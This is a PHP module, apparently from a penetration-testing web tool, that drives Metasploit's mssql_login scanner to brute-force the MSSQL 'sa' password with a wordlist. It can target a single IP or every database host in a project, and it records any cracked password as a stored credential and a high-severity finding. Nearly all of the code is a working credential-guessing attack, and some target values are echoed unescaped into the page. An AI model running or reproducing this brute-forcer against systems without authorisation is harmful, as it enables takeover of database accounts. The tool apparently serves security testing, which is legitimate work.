<?php
if (isset($view) and isset($id) and $view != 'cmd')
{
	echo '<fieldset>';
	if (isset($_POST['submit']))
	{
		echo '<legend>Running command</legend>';
		echo "<script>MakeCmdRequest('cmd_run', '". $view ."', '". http_build_query($_POST) ."', true);</script>";
		echo '<div class="cmd_line" id="cmd_run"><span class="wait">Brute-forcing \'sa\' password of target(s)...</span></div>';
	}
	else echo form_mssqlsa(filter_cmd($id));
	echo '</fieldset>';
}

function link_mssqlsa($target)
{
	if (is_array($target) AND isset($target['target']))
		$target = $target['target'];
	
	return "<p id=\"cmd_mssqlsa_$target\"><a href=\"/view/mssqlsa/$target\">Brute force 'sa' password of ". (is_ip($target) ? $target : 'these servers') ."</a></p>";
}

function run_mssqlsa()
{
	global $_project;
	
	if (!set_and_not_empty($_POST, array('target', 'username', 'dict')))
		return;
	
	$cpt = 0;
	$dict_file = '/opt/dicts/'. basename($_POST['dict']);
	
	if (!file_exists($dict_file))
		die('<span class="err">File does not exist</span>');

	$usr = filter_cmd($_POST['username']);
	$target = filter_cmd($_POST['target']);
	
	if ($target == 'all')
	{
		$hosts = $_project->getHostsByRole('MSSQL Database');
		foreach ($hosts AS $id_host => $h)
		{
			if (do_mssqlsa($h['ipaddr'], $id_host, $usr, $dict_file))
				$cpt++;
		}
		
		if ($cpt)
			echo '<span class="confirm">MSSQL brute-force returned a valid login on '. $cpt .' server(s)</span>';
		else
			echo '<span class="err">MSSQL brute-force did not return a valid login</span>';		
	}
	
	elseif (is_ip($target))
	{
		$host = Host::getByIp($target);
		if (isset($host->id) AND $host->id > 0)
		{
			if (do_mssqlsa($target, $host->id, $usr, $dict_file))
				echo '<span class="confirm">MSSQL brute-force on '. $target .' returned a valid \''. $usr .'\' login</span>';
			else
				echo '<span class="err">MSSQL brute-force on '. $target .' did not return a valid login</span>';	
		}
		else echo '<span class="err">Specified host does not exist in database</span>';
	}
}

function do_mssqlsa($target, $id_host, $usr, $dict_file)
{
/*
   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         true             no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification
   VERBOSE              true             yes       Whether to print output for all attempts
 */
	global $_project;
	
	if (!is_ip($target))
		return False;

	$cmd = new Cmd("/opt/metasploit/msfcli auxiliary/scanner/mssql/mssql_login PASS_FILE=$dict_file STOP_ON_SUCCESS=true THREADS=5 USERNAME=$usr RHOSTS=$target VERBOSE=false E");
	$output = $cmd->exec();
	
	foreach ($output AS $line)
	{
		if (strpos($line, 'MSSQL - successful login'))
		{
			$tab = explode("'", $line);

			$u = new Appuser();
			$u->id_project = $_project->id;
			$u->id_host = $id_host;
			$u->app = 'mssql';
			$u->url = '';
			$u->username = $usr;
			$u->password = $tab[3];
			$u->insert();
			
			$v = new Vuln();
			$v->id_project = $_project->id;
			$v->id_host = $id_host;
			$v->port = '1433';
			$v->descr = "The 'sa' password of this SQL Server Database is '". $tab[3] ."'.";
			$v->severity = 4;
			$v->insert();

			return True;
		}
	}
	
	return False;
}

function form_mssqlsa($target)
{
	$dicts = scandir('/opt/dicts');
	
	$ret = hdr() . '<legend>Brute force \'sa\' passwords</legend>
	<form action="" method="POST">
	<table cellspacing="0">
	<tr class="trhdr"><td colspan="6">Attack configuration: '. $target .'</td></tr>
	<tr class="tdrow2">
	  <td class="bold" width="100">Username:</td>
	  <td width="60">
		<input type="text" size="6" value="sa" name="username" />
	  </td>
	  <td class="bold" width="100">Dictionary:</td>
	  <td width="100">
		<select name="dict">';
	foreach ($dicts AS $file)
	{
		if (is_file('/opt/dicts/'. $file))
			$ret .= "<option value=\"$file\">$file</option>\n";
	}
	$ret .='  </select>
	    <input type="hidden" name="target" value="'. $target .'" />
	  </td>
	  <td><a href="/view/config/dicts">Manage dictionaries...</a></td>
	  <td><input type="submit" name="submit" value="Run attack ..." /></td>
	</tr>
	</table>
	</form>';
	
	return $ret;
}
?>
